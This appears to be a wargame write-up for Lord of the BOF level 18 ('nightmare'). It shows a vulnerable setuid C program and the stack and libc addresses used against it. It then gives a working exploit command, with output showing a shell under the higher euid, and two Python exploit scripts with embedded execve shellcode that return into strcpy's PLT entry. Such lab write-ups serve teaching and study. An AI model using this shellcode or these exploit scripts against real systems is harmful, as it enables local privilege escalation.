[LOB]Level18. nightmare

plt

/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>

main(int argc, char *argv[])
{
    char buffer[40];
    char *addr;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // check address
    addr = (char *)&strcpy;
    if(memcmp(argv[1]+44, &addr, 4) != 0){
        printf("You must fall in love with strcpy()\n");
        exit(0);
    }

    // overflow!
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    // dangerous waterfall
    memset(buffer+40+8, 'A', 4);
}

0x01. Analysis

strcpy = 0x8048410

system = 0x40058ae0

ebp-40 = 0xbffffaa0

“/bin/sh” = 0x400fbff9

ret+4 = 0xbffffad0

char *strcpy(char *_Dest, char const *_Source);

0x02. Exploit

[succubus@localhost succubus]$ ./nightmare `python -c 'print "\xe0\x8a\x05\x40"+"A"*4+"\xf9\xbf\x0f\x40"+"A"*32+"\x10\x84\x04\x08"+"A"*4+"\xd0\xfa\xff\xbf"+"\xa0\xfa\xff\xbf"'`
�@AAAA�@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������
bash$ id
uid=517(succubus) gid=517(succubus) euid=518(nightmare) egid=518(nightmare) groups=517(succubus)
bash$ my-pass
euid = 518
beg for me

shellcode 이용 코드

shellcode(24byte) :
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

import os
import struct

append = lambda x: payload + x
p32 = lambda x: struct.pack("<I", x)

target = "/home/succubus/nightmare"

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

strcpy_plt = 0x8048410
main_ret = 0xbffffbdc
shellcode_addr = main_ret + 16
buffer_addr = main_ret - 44

payload = shellcode                     # buffer[40] + sfp
payload = append("\x90"*(44-len(shellcode)))
payload = append(p32(strcpy_plt))       # ret
payload = append("\x90"*4)              # padding
payload = append(p32(main_ret+4))       # strcpy arg1
payload = append(p32(shellcode_addr))   # strcpy arg2
payload = append(p32(buffer_addr))

pid = os.fork()

if pid == 0:
        os.execv(target, (target, payload))
else:
        os.waitpid(pid, 0)

환경변수 이용 코드

# 환경변수에 shellcode 등록 후 진행
import os
import struct

append = lambda x: payload + x
p32 = lambda x: struct.pack("<I", x)

target = "/home/succubus/nightmare"

strcpy_plt = 0x8048410
main_ret = 0xbffffbdc
shellcode_addr = 0xbffffbec
shellcode_env = 0xbffffe8b

payload = "\x90"*44                     # buffer[40] + sfp
payload = append(p32(strcpy_plt))       # ret
payload = append("\x90"*4)              # padding
payload = append(p32(main_ret+4))       # strcpy arg1
payload = append(p32(shellcode_addr))   # strcpy arg2
payload = append(p32(shellcode_env))	

pid = os.fork()

if pid == 0:
        os.execv(target, (target, payload))
else:
        os.waitpid(pid, 0)

PREVIOUS[LOB]Level17. succubus

NEXT[LOB]Level19. xavius